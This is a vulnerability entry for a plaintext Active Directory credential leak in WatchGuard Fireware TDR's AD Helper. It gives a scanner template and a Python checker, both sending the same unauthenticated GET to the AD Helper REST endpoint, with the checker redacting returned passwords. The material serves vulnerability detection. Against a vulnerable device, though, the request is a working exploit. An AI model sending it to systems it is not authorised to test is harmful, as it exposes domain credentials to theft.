WatchGuard Fireware Threat Detection and Response (TDR) contains a credential-disclosure vulnerability in its AD Helper component: the AD Helper REST API returns the Active Directory credentials it stores for a Windows domain (logon domain, username and password) in plaintext to an unauthenticated requester.
PoC code [public]
id: watchguard-credentials-disclosure
info:
  name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
  author: gy741
  severity: critical
  description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
  reference:
    - https://www.exploit-db.com/exploits/48203
    - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
rules:
  r0:
    request:
      method: GET
      path: /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
    expression: response.status == 200 && response.body.bcontains(b'"fullyQualifiedName"') && response.body.bcontains(b'"logonDomain"') && response.body.bcontains(b'"username"') && response.body.bcontains(b'"password"')
expression: r0()
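The template above only tells a scanner "vulnerable or not". As an added example (my own code, not gy741's template nor anything from WatchGuard), the Python below replays the same predicate as rule r0 outside the scanning engine, parses the response so a report can name the exposed domain and account without copying the secret itself, and includes the live GET for use against a device you are authorised to test. The request path is taken from the template; the response shape (a JSON array of domain objects carrying the four quoted keys, possibly wrapped in an object) and the sample body are assumptions and are constructed, not captured from a real device.

```python
"""Stand-alone checker mirroring xray rule r0 (added example, not the template
author's code). Request path is from the template; the JSON response layout is
an assumption, so the parser tolerates both a bare array and a wrapped one."""
from __future__ import annotations

import json
import ssl
import urllib.error
import urllib.request

# Same unauthenticated request the template sends.
PATH = "/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
# Rule r0 requires every one of these quoted key names in the body.
REQUIRED_KEYS = ("fullyQualifiedName", "logonDomain", "username", "password")


def matches_rule(status: int, body: bytes) -> bool:
    """Exact equivalent of r0: HTTP 200 and each quoted key present as a substring."""
    if status != 200:
        return False
    return all(('"%s"' % key).encode() in body for key in REQUIRED_KEYS)


def summarize_domains(body: bytes) -> list:
    """Parse the body and return one record per domain with the password redacted.

    A finding only needs proof that a secret was returned, not the secret, so
    only its presence and length are kept. Assumes a JSON array of objects, or
    an object whose first list-valued field is that array (assumption).
    """
    data = json.loads(body)
    if isinstance(data, dict):
        data = next((v for v in data.values() if isinstance(v, list)), [])
    records = []
    for entry in data:
        if not isinstance(entry, dict):
            continue
        password = entry.get("password")
        records.append({
            "fullyQualifiedName": entry.get("fullyQualifiedName"),
            "logonDomain": entry.get("logonDomain"),
            "username": entry.get("username"),
            "password_present": isinstance(password, str) and password != "",
            "password_length": len(password) if isinstance(password, str) else 0,
        })
    return records


def check_target(base_url: str, timeout: float = 10.0, verify_tls: bool = True) -> tuple:
    """Live check: unauthenticated GET to the AD Helper endpoint on base_url.

    verify_tls=False is for appliances with self-signed certificates; only use
    it on hosts you control or are authorised to test.
    """
    ctx = None if verify_tls else ssl._create_unverified_context()
    req = urllib.request.Request(base_url.rstrip("/") + PATH, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        # A 401/403/404 still yields a body; let matches_rule reject it on status.
        status, body = err.code, err.read()
    if not matches_rule(status, body):
        return False, []
    return True, summarize_domains(body)


# Constructed sample response (not captured from a real device) to exercise the
# logic offline; the field names are the ones rule r0 looks for.
SAMPLE_BODY = json.dumps([
    {"fullyQualifiedName": "corp.example.test", "logonDomain": "CORP",
     "username": "svc-tdr", "password": "Hunter2!"},
]).encode()

if __name__ == "__main__":
    print(matches_rule(200, SAMPLE_BODY))
    print(summarize_domains(SAMPLE_BODY))
```

Run `check_target("https://<ad-helper-host>:<port>")` for a live test; a 200 with all four keys is reported as vulnerable, anything else (including a 401 that happens to echo the key names in an error page) is not, because the status test runs first.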